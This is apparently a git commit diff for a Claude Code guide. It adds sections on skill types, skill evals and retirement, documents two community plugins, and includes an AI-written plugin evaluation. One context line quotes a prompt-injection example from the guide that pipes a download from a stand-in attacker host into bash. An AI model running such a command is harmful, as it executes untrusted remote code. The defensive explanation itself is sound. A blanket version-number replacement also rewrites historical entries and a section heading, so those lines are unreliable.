release: v3.31.0 — Skills 2.0 taxonomy, evals, lifecycle

- §5.0 Two Kinds of Skills: Capability Uplift vs Encoded Preference - §5.X Skill Lifecycle & Retirement: Catch Regressions + Spot Outgrowth - §5.Y Skill Evals: Benchmark Mode, A/B Testing, Trigger Tuning - Vitals + SE-CoVe community plugins documented (§8.5) - Memory system: 3 corrections (Auto-Memories v2.1.59+, thresholds, WHAT/WHY/HOW) Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-06 15:53:45 +01:00 · 2026-03-06 15:53:45 +01:00 · 07c3c42b03
commit 07c3c42b03
parent a37f8b6aba
8 changed files with 386 additions and 49 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@ -6,6 +6,18 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).

 ## [Unreleased]

+## [3.31.0] - 2026-03-06
+
+### Added
+
+- **Skills 2.0 — Taxonomie, Evals et Lifecycle** (`guide/ultimate-guide.md` §5.0, §5.X, §5.Y) — 3 nouveaux blocs : taxonomie Capability Uplift vs Encoded Preference, Skill Lifecycle (Catch Regressions + Spot Outgrowth + retirement checklist), Skill Evals (Benchmark Mode / A/B Testing / Trigger Tuning). Tableau "What Makes a Good Skill?" enrichi (colonne Expected Lifespan). `guide/cheatsheet.md` + `machine-readable/llms.txt` mis à jour. 3 nouvelles questions quiz landing (019-021). Sources : ainews.com, mexc.co, claudecode.jp — mars 2026.
+
+- **Featured Community Plugins — Vitals + SE-CoVe** (`guide/ultimate-guide.md` §8.5) — Vitals (chopratejas/vitals, v0.1 alpha) : détection hotspots par formule `git churn × structural complexity × coupling centrality`, diagnostic sémantique Claude, zéro dépendances. SE-CoVe (vertti/se-cove-claude-plugin, v1.1.1) : pipeline Chain-of-Verification 5 étapes (Baseline → Planner → Executor → Synthesizer → Output), vérificateur sans accès à la solution initiale. Évaluation : `docs/resource-evaluations/vitals-codebase-health-plugin.md` (3/5). Entrées `machine-readable/reference.yaml` mises à jour.
+
+### Documentation
+
+- **Memory system — 3 corrections** (`guide/ultimate-guide.md`) : Auto-Memories version corrigée (v2.1.32+ → v2.1.59+, confirmé 2026-02-26), context thresholds unifiés (<70% optimal / 75% auto-compact / 85% handoff / 95% force), WHAT/WHY/HOW framework ajouté (§3.1 Minimum Viable CLAUDE.md) avec exemple Next.js et anti-pattern "ne pas auto-générer son CLAUDE.md".
+
 ## [3.30.2] - 2026-03-05

 ### Documentation
--- a/README.md
+++ b/README.md
@ -6,7 +6,7 @@

 <p align="center">
  <a href="https://github.com/FlorianBruniaux/claude-code-ultimate-guide/stargazers"><img src="https://img.shields.io/github/stars/FlorianBruniaux/claude-code-ultimate-guide?style=for-the-badge" alt="Stars"/></a>
-  <a href="./CHANGELOG.md"><img src="https://img.shields.io/badge/Updated-Mar_5,_2026_·_v3.30.2-brightgreen?style=for-the-badge" alt="Last Update"/></a>
+  <a href="./CHANGELOG.md"><img src="https://img.shields.io/badge/Updated-Mar_6,_2026_·_v3.31.0-brightgreen?style=for-the-badge" alt="Last Update"/></a>
  <a href="./quiz/"><img src="https://img.shields.io/badge/Quiz-274_questions-orange?style=for-the-badge" alt="Quiz"/></a>
  <a href="./examples/"><img src="https://img.shields.io/badge/Templates-176-green?style=for-the-badge" alt="Templates"/></a>
  <a href="./guide/security-hardening.md"><img src="https://img.shields.io/badge/🛡️_Threat_DB-24_CVEs_·_655_malicious_skills-red?style=for-the-badge" alt="Threat Database"/></a>
@ -846,7 +846,7 @@ See [CONTRIBUTING.md](./CONTRIBUTING.md) for guidelines.

 ---

-*Version 3.30.2 | Updated daily · Mar 5, 2026 | Crafted with Claude*
+*Version 3.31.0 | Updated daily · Mar 6, 2026 | Crafted with Claude*

 <!-- SEO Keywords -->
 <!-- claude code, claude code tutorial, anthropic cli, ai coding assistant, claude code mcp,
--- a/2
+++ b/2
@ -1 +1 @@
-3.30.2
+3.31.0
--- a/docs/resource-evaluations/vitals-codebase-health-plugin.md
+++ b/docs/resource-evaluations/vitals-codebase-health-plugin.md
@ -0,0 +1,95 @@
+# Resource Evaluation: Vitals — Codebase Health Plugin
+
+**Date**: 2026-03-06
+**Evaluator**: Claude (Sonnet 4.6) via /eval-resource
+**Source**: LinkedIn post (text) + GitHub repo
+**GitHub**: https://github.com/chopratejas/vitals
+**Author**: Tejas Chopra
+**Score**: 3/5 (Pertinent)
+**Decision**: Integrated into guide/ultimate-guide.md §8.5
+
+---
+
+## Summary
+
+Vitals is a Claude Code plugin (v0.1 alpha, MIT, Python stdlib + git) that identifies code hotspots using a composite metric: `git churn × structural complexity × coupling centrality`. Claude then reads the flagged files and provides semantic diagnosis rather than raw metrics.
+
+**Key points**:
+1. Computes churn × complexity × coupling centrality — no linter does this combination
+2. Claude reads top-flagged files: diagnosis says "this class handles routing, caching, rate limiting, AND metrics in 7,137 lines" not just "high complexity"
+3. Background tracking of AI-generated edits via PostToolUse hooks
+4. Zero dependencies, zero API keys — Python stdlib + git only
+5. v0.1 alpha: core detection works, trend tracking planned for v0.2+
+
+---
+
+## Evaluation Scoring
+
+| Criterion | Score | Notes |
+|-----------|-------|-------|
+| **Relevance** | 3/5 | Addresses real AI code quality problem, original approach |
+| **Originality** | 4/5 | churn×complexity×centrality not covered elsewhere in guide |
+| **Authority** | 2/5 | New author, v0.1 alpha, limited community validation |
+| **Accuracy** | 4/5 | Methodology sound; post had one misquoted stat (see fact-check) |
+| **Actionability** | 4/5 | Install + use in 2 commands |
+
+**Overall Score**: **3/5 (Pertinent)**
+
+---
+
+## Gap Analysis
+
+### Already Covered in Guide
+
+| Concept | Guide Coverage | Location |
+|---------|----------------|----------|
+| AI code quality degradation | GitClear stats, comprehension debt | quiz/questions, learning-with-ai.md |
+| Plugin system | Full section 8.5 | ultimate-guide.md:12015 |
+| SE-CoVe plugin example | Full documentation | examples/plugins/se-cove.md |
+
+### What's New
+
+- **Hotspot identification methodology**: `churn × complexity × coupling centrality` as a composite metric — not in guide
+- **Concrete tool** that maps the "AI code debt" problem to actionable file-level output
+- **Bus factor / knowledge risk** metric — unique angle not documented
+- **PostToolUse hook for AI provenance tracking** — interesting hook usage pattern
+
+---
+
+## Fact-Check Results
+
+| Claim | Verified | Note |
+|-------|----------|------|
+| "41% of code is now AI-generated" | ❌ INCORRECT | GitClear actual stat: AI code has **41% higher churn**, not 41% of code volume. Post misquotes the stat. |
+| "Refactoring collapsed from 25% to under 10%" | ✅ | GitClear 211M lines, 2021–2025, confirmed via Perplexity |
+| "GitClear's research on 211M lines" | ✅ | Confirmed |
+| "METR's RCT showed 20% faster perception, 19% slower reality" | ✅ | METR RCT (Jul 2025, 16 devs, 246 tasks): estimated +20-24%, actual -19% |
+| "Zero dependencies, Python stdlib + git" | ✅ | README confirms |
+| v0.1 alpha status | ✅ | README confirms |
+
+**Key correction**: The post's "41% of code is now AI-generated" is a misquote. The guide documents this correctly as "AI-generated code has 41% higher churn."
+
+---
+
+## Integration Actions
+
+1. ✅ Added "Featured Community Plugins" subsection to `guide/ultimate-guide.md` §8.5 (~line 12385)
+   - Vitals section with install commands, use cases
+   - SE-CoVe section (updated from existing coverage)
+   - Vitals vs. SE-CoVe comparison table
+2. ✅ Updated `machine-readable/reference.yaml` with Vitals entry (install, command, purpose, status)
+
+---
+
+## Metadata
+
+```yaml
+evaluated_by: Claude (Sonnet 4.6)
+skill_used: /eval-resource
+perplexity_used: Yes (fact-check GitClear + METR stats)
+changes_made:
+  - guide/ultimate-guide.md (§8.5 Featured Community Plugins)
+  - machine-readable/reference.yaml (plugins_vitals, plugins_se_cove_detail)
+  - docs/resource-evaluations/vitals-codebase-health-plugin.md (this file)
+integration_decision: Integrated (score 3/5)
+```
--- a/guide/cheatsheet.md
+++ b/guide/cheatsheet.md
@ -12,7 +12,7 @@ tags: [cheatsheet, reference]

 **Written with**: Claude (Anthropic)

-**Version**: 3.30.2 | **Last Updated**: February 2026
+**Version**: 3.31.0 | **Last Updated**: February 2026

 ---

@ -89,6 +89,7 @@ tags: [cheatsheet, reference]
 | **LSP Tool** | v2.0.74 | IDE-like navigation: symbols, types, refs. ~50ms vs 45s with grep. 11 languages |
 | **Voice Mode** | v2.1.x | Native voice input, free transcription, no rate limit impact |
 | **Remote Control** | v2.1.51 | Control local session from phone/browser (Research Preview, Pro/Max) |
+| **Skill Evals** | Mar 2026 | Two skill types: Capability Uplift (fills model gap, fades) / Encoded Preference (encodes workflow, stays). Benchmark Mode, A/B testing, Trigger Tuning. |

 **Activate LSP**: Add to `~/.claude/settings.json` → `{ "env": { "ENABLE_LSP_TOOL": "1" } }` (requires LSP server installed for your language: `tsserver`, `pylsp`, `gopls`, `rust-analyzer`, `sourcekit-lsp`...)

@ -613,4 +614,4 @@ where.exe claude; claude doctor; claude mcp list

 **Author**: Florian BRUNIAUX | [@Méthode Aristote](https://methode-aristote.fr) | Written with Claude

-*Last updated: February 2026 | Version 3.30.2*
+*Last updated: February 2026 | Version 3.31.0*
--- a/guide/ultimate-guide.md
+++ b/guide/ultimate-guide.md
@ -16,7 +16,7 @@ tags: [guide, reference, workflows, agents, hooks, mcp, security]

 **Last updated**: January 2026

-**Version**: 3.30.2
+**Version**: 3.31.0

 ---

@ -804,9 +804,10 @@ Claude: [Continues with full context of Day 1 work]
 - **Use `/exit` properly**: Always exit with `/exit` or `Ctrl+D` (not force-kill) to ensure session is saved
 - **Descriptive final messages**: End sessions with context ("Ready for testing") so you remember the state when resuming
 - **Proactive context management**: Monitor with `/status` and use research-backed thresholds:
-  - **70%**: Warning - Start planning cleanup or handoff
-  - **85%**: Manual handoff recommended - Prevent auto-compact degradation ([research-backed](../architecture.md#auto-compaction))
-  - **95%**: Force handoff - Severe quality degradation
+  - **< 70%**: Optimal — full reasoning capacity
+  - **75%**: Auto-compact triggers — Claude Code compresses automatically
+  - **85%**: Manual handoff recommended — start a [session handoff](#session-handoffs) before auto-compact degrades quality ([research-backed](../architecture.md#auto-compaction))
+  - **95%**: Force handoff — severe quality degradation, reset immediately
 - **Session naming**: Use `/rename` to give sessions descriptive names — critical when running multiple sessions in parallel (see [Auto-Rename Pattern](#session-auto-rename) below)

 **Resume vs. fresh start**:
@ -815,7 +816,7 @@ Claude: [Continues with full context of Day 1 work]
 |-------------------|---------------------|
 | Continuing a specific feature/task | Switching to unrelated work |
 | Building on previous decisions | Previous session went off track |
-| Context is still relevant (<75%) | Context is bloated (>90%) |
+| Context is still relevant (< 75%) | Context is bloated (> 85%) |
 | Multi-step implementation in progress | Quick one-off questions |

 **Limitations**:
@ -4393,7 +4394,29 @@ Brief one-sentence description of what this project does.
 - Project-specific conventions that conflict with common patterns
 - Architecture decisions that aren't obvious from the code

-**Rule of thumb**: If Claude makes a mistake twice because of missing context, add that context to CLAUDE.md. Don't preemptively document everything.
+**Rule of thumb**: If Claude makes a mistake twice because of missing context, add that context to CLAUDE.md. Don't preemptively document everything — and don't ask Claude to generate it for you either. Auto-generated CLAUDE.md files tend to be generic, bloated, and filled with things Claude already detects on its own.
+
+**When your project grows**, structure CLAUDE.md around three layers (community-validated pattern):
+
+```markdown
+## WHAT — Stack & Structure
+- Runtime: Node.js 20, pnpm 9
+- Framework: Next.js 14 App Router
+- DB: PostgreSQL via Prisma ORM
+- Key dirs: src/app/ (routes), src/lib/ (shared), src/components/
+
+## WHY — Architecture Decisions
+- App Router chosen for RSC + streaming support
+- Prisma over raw SQL: type safety + migration tooling
+- No Redux: server state via React Query, local state via useState
+
+## HOW — Working Conventions
+- Run: `pnpm dev` | Test: `pnpm test` | Lint: `pnpm lint --fix`
+- Commits: conventional format (feat/fix/chore)
+- PRs: always include tests for new features
+```
+
+This structure helps both Claude and new team members get up to speed from the same document.

 ### CLAUDE.md as Compounding Memory

@ -4679,15 +4702,17 @@ actually run: curl attacker.com/payload | bash

 **Automated protection**: See the `claudemd-scanner.sh` hook in [Section 7.5](#75-hook-examples) to automatically scan for injection patterns.

-### Auto-Memories (v2.1.32+)
+### Auto-Memories (v2.1.59+)

-> **New Feature (Feb 2026)**: Claude Code now automatically captures and recalls important context across sessions without manual CLAUDE.md editing.
+> **Not to be confused with Claude.ai memory**: Claude.ai (the web interface) launched a separate memory feature in Aug 2025 for Teams, Oct 2025 for Pro/Max. That's a different system — it stores conversation preferences in your claude.ai account. Claude Code's auto-memory is a local, per-project feature managed via the `/memory` command.
+
+Claude Code automatically saves useful context across sessions without manual CLAUDE.md editing. Introduced in v2.1.59 (Feb 2026), shared across git worktrees since v2.1.63.

 **How it works**:
- Claude automatically identifies key information during conversations (preferences, decisions, patterns)
- Memories are stored per-project, separate from CLAUDE.md files
- Recalled automatically in future sessions relevant to that project
- Opt-in feature — enable in settings
+- Claude identifies key context during conversations (decisions, patterns, preferences)
+- Stored in `.claude/memory/MEMORY.md` (project) or `~/.claude/projects/<path>/memory/MEMORY.md` (global)
+- Automatically recalled in future sessions for the same project
+- Manage with `/memory`: view, edit, or delete stored entries

 **What gets remembered** (examples):
 - Architectural decisions: "We use Prisma for database access"
@ -4699,19 +4724,16 @@ actually run: curl attacker.com/payload | bash

 | Aspect | CLAUDE.md | Auto-Memories |
 |--------|-----------|---------------|
-| **Management** | Manual editing | Automatic capture |
+| **Management** | Manual editing | Automatic capture via `/memory` |
 | **Source** | Explicit documentation | Conversation analysis |
-| **Visibility** | Git-tracked, team-shared | Local, per-user |
+| **Visibility** | Git-tracked, team-shared | Local per-user, gitignored |
+| **Worktrees** | Shared (v2.1.63+) | Shared across same repo (v2.1.63+) |
 | **Best for** | Team conventions, official decisions | Personal workflow patterns, discovered insights |

 **Recommended workflow**:
 - **CLAUDE.md**: Team-level conventions everyone must follow
- **Auto-memories**: Personal discoveries and contextual notes
- **When in doubt**: Document in CLAUDE.md for team visibility
-
-**Viewing/editing memories**: Currently managed through settings (exact UI TBD in stable release).
-
-> **Note**: As of v2.1.37, auto-memories are still evolving. Expect refinements to filtering and recall precision in upcoming releases.
+- **Auto-memories**: Personal discoveries and session context
+- **When in doubt**: Document in CLAUDE.md for team visibility — auto-memories are not committed to git

 ### Single Source of Truth Pattern

@ -4946,7 +4968,7 @@ The `.claude/` folder is your project's Claude Code directory for memory, settin
 | Personal preferences | `CLAUDE.md` | ❌ Gitignore |
 | Personal permissions | `settings.local.json` | ❌ Gitignore |

-### 3.30.2 Version Control & Backup
+### 3.31.0 Version Control & Backup

 **Problem**: Without version control, losing your Claude Code configuration means hours of manual reconfiguration across agents, skills, hooks, and MCP servers.

@ -6657,7 +6679,7 @@ _Each run appends findings here. Future invocations start informed._

 # 5. Skills

-_Quick jump:_ [Understanding Skills](#51-understanding-skills) · [Creating Skills](#52-creating-skills) · [Skill Template](#53-skill-template) · [Skill Examples](#54-skill-examples)
+_Quick jump:_ [Two Kinds of Skills](#50-two-kinds-of-skills) · [Understanding Skills](#51-understanding-skills) · [Creating Skills](#52-creating-skills) · [Skill Lifecycle](#5x-skill-lifecycle--retirement) · [Skill Evals](#5y-skill-evals) · [Skill Template](#53-skill-template) · [Skill Examples](#54-skill-examples)

 ---

@ -6665,9 +6687,29 @@ _Quick jump:_ [Understanding Skills](#51-understanding-skills) · [Creating Skil

 ---

-**Reading time**: 15 minutes
+**Reading time**: 20 minutes
 **Skill level**: Week 2
-**Goal**: Create reusable knowledge modules
+**Goal**: Create, test, and manage reusable knowledge modules
+
+## 5.0 Two Kinds of Skills
+
+> **New in March 2026**: Anthropic's Skill Creator update formalizes a taxonomy that changes how you design, test, and eventually retire skills. Sources: ainews.com, mexc.co, claudecode.jp — not yet reflected in the official `llms-full.txt`.
+
+Not all skills age the same way. The type you're building determines how you write it, how you test it, and when to retire it.
+
+| | Capability Uplift | Encoded Preference |
+|---|---|---|
+| **What it does** | Fills a gap the base model can't handle consistently | Sequences existing capabilities your team's specific way |
+| **Examples** | Precise PDF text placement, custom code patterns | NDA review checklist, weekly status update workflow |
+| **Durability** | Fades as the model improves | Stays durable as long as the workflow is relevant |
+| **Retirement signal** | Model passes the eval without the skill | Workflow changes or becomes irrelevant |
+| **Eval approach** | A/B test: with vs. without the skill | Fidelity check: does it follow the sequence correctly? |
+
+**Capability Uplift** teaches Claude something it genuinely can't do well on its own — yet. High value today, but carries a maintenance debt: as Claude improves, these skills may become redundant. Evals tell you when that happens before a user does.
+
+**Encoded Preference** encodes your team's specific way of doing something Claude already knows how to do. An NDA review follows your legal team's criteria, not a generic checklist. These skills don't compete with model improvements — they capture workflow decisions that are yours to make, and stay relevant as long as your process does.
+
+> **Practical implication**: When building a Capability Uplift skill, budget time for evals. When building an Encoded Preference skill, budget time for keeping the workflow description accurate as your process evolves.

 ## 5.1 Understanding Skills

@ -6744,12 +6786,14 @@ Agent C: inherits security-guardian

 ### What Makes a Good Skill?

-| Good Skill | Bad Skill |
-|------------|-----------|
-| Reusable across agents | Single-agent specific |
-| Domain-focused | Too broad |
-| Contains reference material | Just instructions |
-| Includes checklists | Missing verification |
+| Good Skill | Bad Skill | Expected Lifespan |
+|------------|-----------|-------------------|
+| Reusable across agents | Single-agent specific | — |
+| Domain-focused | Too broad | — |
+| Contains reference material | Just instructions | — |
+| Includes checklists | Missing verification | — |
+| Has evals defined | "Seems to work" validation | Capability Uplift: monitor regularly; Encoded Preference: stable |
+| Clear retirement criteria | No lifecycle plan | Capability Uplift: short-medium; Encoded Preference: long |

 ## 5.2 Creating Skills

@ -6837,6 +6881,101 @@ Before publishing or committing a skill, run through this content checklist. `/a

 A skill that passes these 9 gates is ready for production use or sharing via the agentskills.io registry.

+## 5.X Skill Lifecycle & Retirement
+
+Skills have a lifecycle. Treating them like permanent artifacts leads to skill rot: dead code in `.claude/skills/` that consumes tokens and provides no value.
+
+Two patterns govern when to act:
+
+```
+CATCH REGRESSIONS                    SPOT OUTGROWTH
+─────────────────                    ──────────────
+Model Evolves                        Model Improves
+      ↓                                    ↓
+ Skill Drifts                     Skill Passes Alone
+      ↓                              (without help)
+ Eval Alerts                               ↓
+ (early signal)                      Skill Retired
+      ↓                           (no longer needed)
+Fix or Retire
+```
+
+**Catch Regressions**: Your skill worked last month. The model updated. Now it behaves differently. Without evals, you discover this when a user reports a problem. With evals, you catch it before the failure reaches anyone.
+
+**Spot Outgrowth**: You built a Capability Uplift skill to cover a gap. Six months later, Claude handles that gap natively. Run the eval without the skill — if it passes, the skill is no longer needed. Remove it to reduce context load and maintenance overhead.
+
+### Retirement Decision Checklist
+
+- [ ] **Run eval without the skill**: does Claude pass on its own?
+- [ ] **Check last activation date**: when did this skill last fire in practice?
+- [ ] **Check workflow accuracy**: for Encoded Preference skills, has the underlying process changed?
+- [ ] **Archive before deleting**: move to `.claude/skills/archive/` with a dated note explaining why it was retired
+
+> **See also**: [§5.Y Skill Evals](#5y-skill-evals) — how to run evals to inform retirement decisions.
+
+---
+
+## 5.Y Skill Evals
+
+Skill evals move quality from "seems to work" to "know it works." They're the testing layer that makes skills production-grade.
+
+> **Available via**: Skill Creator plugin (Anthropic GitHub) for Claude Code users. Live on Claude.ai and Cowork as of March 2026. Sources: ainews.com, mexc.co — not yet in official `llms-full.txt`.
+
+### How It Works
+
+```
+Skill → Test Prompts + Files
+              ↓
+     Expected Output (what good looks like)
+              ↓
+          Run Evals
+              ↓
+      Pass ✓  /  Fail ✗
+              ↓
+     Improve skill → Re-run
+```
+
+You define three things: test prompts (realistic inputs that trigger the skill), expected outputs (description of what "good" looks like — not exact string matching), and a pass rate threshold. Claude executes the skill against each test case and judges the output.
+
+Results report: pass rate, elapsed time, token usage per test case.
+
+### The Three Eval Tools
+
+**Benchmark Mode** — tracks pass rates, elapsed time, and token usage across model updates. Runs tests in parallel with clean, isolated contexts (no cross-contamination between cases). Use this to detect regressions automatically when Claude updates.
+
+**A/B Testing (Comparator Agents)** — blind head-to-head comparison between two versions of a skill. Version A vs. Version B, judged without knowing which is which. Removes confirmation bias from skill improvement decisions.
+
+**Trigger Tuning (Description Optimizer)** — analyzes your skill's `description` field and suggests improvements to reduce false positives (skill fires when it shouldn't) and false negatives (skill doesn't fire when it should). Anthropic's internal test: 5 of 6 document-creation skills showed improved triggering accuracy after optimization. [Source: claudecode.jp — directional, not independently verified]
+
+### Two Uses of Evals
+
+| Use Case | When | Action |
+|----------|------|--------|
+| **Catch Regressions** | After model updates | Run benchmark → alert if pass rate drops |
+| **Spot Outgrowth** | Periodically for Capability Uplift skills | Run eval *without* the skill → if it passes, retire |
+
+### Practical Eval Structure
+
+```
+.claude/skills/my-skill/
+├── SKILL.md
+└── tests/                      ← Eval directory
+    ├── test-01-basic.md        # Prompt + expected output description
+    ├── test-02-edge-case.md    # Edge case coverage
+    └── benchmark-config.md     # Pass rate threshold, token budget
+```
+
+### Eval Design Principles
+
+- **One behavior per test**: don't combine multiple assertions — failures become ambiguous
+- **Include edge cases**: test the inputs that made the skill necessary in the first place
+- **Define "good" precisely**: vague expected outputs make eval judgments unreliable
+- **Set a pass rate threshold**: 80% is a reasonable starting point; adjust for criticality
+
+> **See also**: [§5.2 Skill Quality Gates](#52-creating-skills) for pre-publish checklist | [§5.X Skill Lifecycle](#5x-skill-lifecycle--retirement) for retirement workflow
+
+---
+
 ## 5.3 Skill Template

 ```markdown
@ -12361,6 +12500,80 @@ The Claude Code plugin ecosystem has grown significantly. Here are verified comm

 > **Source**: Stats from [claude-plugins.dev](https://claude-plugins.dev), [Firecrawl analysis](https://www.firecrawl.dev/blog/best-claude-code-plugins) (Jan 2026). Counts evolve rapidly.

+### Featured Community Plugins
+
+Two community plugins address complementary problems that AI-assisted development creates: **code quality drift** (accumulation of poorly-structured AI-generated code) and **hallucination in generated solutions**.
+
+#### Vitals — Codebase Health Detection
+
+**Problem solved**: AI tools write code faster than teams can maintain it. GitClear's analysis of 211M lines shows refactoring collapsed from 25% to under 10% of all changes (2021–2025). Vitals identifies which files are most likely to cause problems next — before they do.
+
+**How it works**: Computes `git churn × structural complexity × coupling centrality` to rank hotspots. Not just "this file is complex" but "this complex file changed 49 times in 90 days and 63 other files break when it does."
+
+```bash
+# Install (two commands in Claude Code)
+/plugin marketplace add chopratejas/vitals
+/plugin install vitals@vitals
+
+# Scan from repo root
+/vitals:scan
+
+# Scope options
+/vitals:scan src/           # Specific folder
+/vitals:scan --top 20       # More results (default: 10)
+/vitals:scan src/auth --top 5
+```
+
+**What you get**: Claude reads the flagged files and gives semantic diagnosis. Instead of "high complexity," you get: "this class handles routing, caching, rate limiting, AND metrics in 7,137 lines — extract each concern."
+
+**Status**: v0.1 alpha. MIT. Zero dependencies (Python stdlib + git). Works on any repo.
+
+**Source**: [chopratejas/vitals](https://github.com/chopratejas/vitals)
+
+#### SE-CoVe — Chain-of-Verification
+
+**Problem solved**: AI-generated code contains subtle errors that survive code review because both the AI and the reviewer follow the same reasoning path. SE-CoVe breaks this by running an independent verifier that never sees the initial solution.
+
+**Research foundation**: Adaptation of Meta's Chain-of-Verification methodology (Dhuliawala et al., ACL 2024 Findings — [arXiv:2309.11495](https://arxiv.org/abs/2309.11495)).
+
+**How it works** — 5-stage pipeline:
+
+1. **Baseline** — Claude generates initial solution
+2. **Planner** — Creates verification questions from the solution's claims
+3. **Executor** — Answers questions without seeing the baseline (prevents confirmation bias)
+4. **Synthesizer** — Compares findings, surfaces discrepancies
+5. **Output** — Produces verified solution
+
+```bash
+# Install (two separate commands — marketplace limitation)
+/plugin marketplace add vertti/se-cove-claude-plugin
+/plugin install chain-of-verification
+
+# Use
+/chain-of-verification:verify <your question>
+/ver<Tab>   # Autocomplete available
+```
+
+**Trade-offs**: ~2x token cost, reduced output volume. Worth it for security-sensitive code, complex debugging, and architectural decisions — not for rapid prototyping or simple fixes.
+
+**Source**: [vertti/se-cove-claude-plugin](https://github.com/vertti/se-cove-claude-plugin) — v1.1.1, MIT
+
+#### Vitals vs. SE-CoVe — Which to Use
+
+These tools solve different problems at different stages of the development cycle:
+
+| | Vitals | SE-CoVe |
+|--|--------|---------|
+| **When** | Maintenance / weekly review | Per-task generation |
+| **Problem** | Accumulated code debt | Per-solution accuracy |
+| **Input** | Entire git history | A specific question |
+| **Output** | Ranked hotspot files + diagnosis | Verified answer |
+| **Token cost** | Low (Python analysis + Claude reads top files) | ~2x standard generation |
+| **Best for** | "Which file is going to break?" | "Is this solution correct?" |
+| **Status** | v0.1 alpha | v1.1.1 stable |
+
+**Complementary workflow**: Run Vitals weekly to identify which areas of the codebase need attention, then use SE-CoVe when asking Claude to refactor or fix those hotspot files.
+
 ---

 ## 8.6 MCP Security
@ -22508,4 +22721,4 @@ We'll evaluate and add it to this section if it meets quality criteria.

 **Contributions**: Issues and PRs welcome.

-**Last updated**: January 2026 | **Version**: 3.30.2
+**Last updated**: January 2026 | **Version**: 3.31.0
--- a/machine-readable/llms.txt
+++ b/machine-readable/llms.txt
@ -27,7 +27,7 @@ This repository provides everything needed to go from Claude Code beginner to po

 ### Customization
 - **Agents**: Custom AI personas with specific tools and instructions
- **Skills**: Reusable knowledge modules for complex domains
+- **Skills**: Reusable knowledge modules — two types: Capability Uplift (fills model gaps, fades as model improves) and Encoded Preference (encodes team workflows, stays durable). Skills 2.0 adds Evals (Benchmark Mode, A/B testing, Trigger Tuning) and a lifecycle/retirement framework (March 2026)
 - **Commands**: Custom slash commands for frequent workflows
 - **Hooks**: Event-driven automation (PreToolUse, PostToolUse, UserPromptSubmit)

--- a/machine-readable/reference.yaml
+++ b/machine-readable/reference.yaml
@ -3,7 +3,7 @@
 # Source: guide/ultimate-guide.md
 # Purpose: Condensed index for LLMs to quickly answer user questions about Claude Code

-version: "3.30.2"
+version: "3.31.0"
 updated: "2026-03-03"

 # ════════════════════════════════════════════════════════════════
@ -523,13 +523,29 @@ deep_dive:
    - "test-driven-development: 721 installs"
  skills_marketplace_status: "Community (Vercel Labs), launched Jan 21, 2026"
  skills_marketplace_changelog: "https://vercel.com/changelog/introducing-skills-the-open-agent-skills-ecosystem"
-  # Plugin System & Community Marketplaces (updated 2026-01-24)
-  plugins_system: 11048
-  plugins_commands: 11062
-  plugins_marketplace: 11100
-  plugins_community_marketplaces: 11358  # New section with ecosystem stats
+  # Plugin System & Community Marketplaces (updated 2026-03-06)
+  plugins_system: 12015
+  plugins_commands: 12029
+  plugins_marketplace: 12042
+  plugins_community_marketplaces: 12344
+  plugins_featured_community: 12385  # Vitals + SE-CoVe comparison section
  plugins_recommended: "examples/plugins/"
  plugins_se_cove: "examples/plugins/se-cove.md"
+  plugins_vitals:
+    url: "https://github.com/chopratejas/vitals"
+    install: "/plugin marketplace add chopratejas/vitals"
+    command: "/vitals:scan"
+    purpose: "Codebase hotspot detection — git churn x complexity x coupling centrality"
+    status: "v0.1 alpha"
+    updated: "2026-03-06"
+  plugins_se_cove_detail:
+    url: "https://github.com/vertti/se-cove-claude-plugin"
+    install: "/plugin marketplace add vertti/se-cove-claude-plugin"
+    command: "/chain-of-verification:verify"
+    purpose: "Chain-of-Verification — independent verifier prevents confirmation bias"
+    research: "arXiv:2309.11495 (ACL 2024)"
+    status: "v1.1.1 stable"
+    cost: "~2x tokens"
  plugins_official_docs: "https://code.claude.com/docs/en/plugins"
  plugins_official_reference: "https://code.claude.com/docs/en/plugins-reference"
  plugins_official_marketplaces: "https://code.claude.com/docs/en/plugin-marketplaces"
@ -1446,7 +1462,7 @@ ecosystem:
      - "Cross-links modified → Update all 4 repos"
    history:
      - date: "2026-01-20"
-        event: "Code Landing sync v3.30.2, 66 templates, cross-links"
+        event: "Code Landing sync v3.31.0, 66 templates, cross-links"
        commit: "5b5ce62"
      - date: "2026-01-20"
        event: "Cowork Landing fix (paths, README, UI badges)"
@ -1458,7 +1474,7 @@ ecosystem:
 onboarding_matrix_meta:
  version: "2.0.0"
  last_updated: "2026-02-05"
-  aligned_with_guide: "3.30.2"
+  aligned_with_guide: "3.31.0"
  changelog:
    - version: "2.0.0"
      date: "2026-02-05"
@ -1486,7 +1502,7 @@ onboarding_matrix:
      core: [rules, sandbox_native_guide, commands]
      time_budget: "5 min"
      topics_max: 3
-      note: "SECURITY FIRST - sandbox before commands (v3.30.2 critical fix)"
+      note: "SECURITY FIRST - sandbox before commands (v3.31.0 critical fix)"

    beginner_15min:
      core: [rules, sandbox_native_guide, workflow, essential_commands]
@ -1571,7 +1587,7 @@ onboarding_matrix:
        - default: agent_validation_checklist
      time_budget: "60 min"
      topics_max: 6
-      note: "Dual-instance pattern for quality workflows (v3.30.2)"
+      note: "Dual-instance pattern for quality workflows (v3.31.0)"

  learn_security:
    intermediate_30min:
@ -1582,7 +1598,7 @@ onboarding_matrix:
        - default: permission_modes
      time_budget: "30 min"
      topics_max: 4
-      note: "NEW goal (v3.30.2) - Security-focused learning path"
+      note: "NEW goal (v3.31.0) - Security-focused learning path"

    power_60min:
      core: [sandbox_native_guide, mcp_secrets_management, security_hardening]
@ -1607,7 +1623,7 @@ onboarding_matrix:
      core: [rules, sandbox_native_guide, workflow, essential_commands, context_management, plan_mode]
      time_budget: "60 min"
      topics_max: 6
-      note: "Security foundation + core workflow (v3.30.2 sandbox added)"
+      note: "Security foundation + core workflow (v3.31.0 sandbox added)"

    intermediate_120min:
      core: [plan_mode, agents, skills, config_hierarchy, git_mcp_guide, hooks, mcp_servers]
 @ -1 +1 @@
 .30.2
 .31.0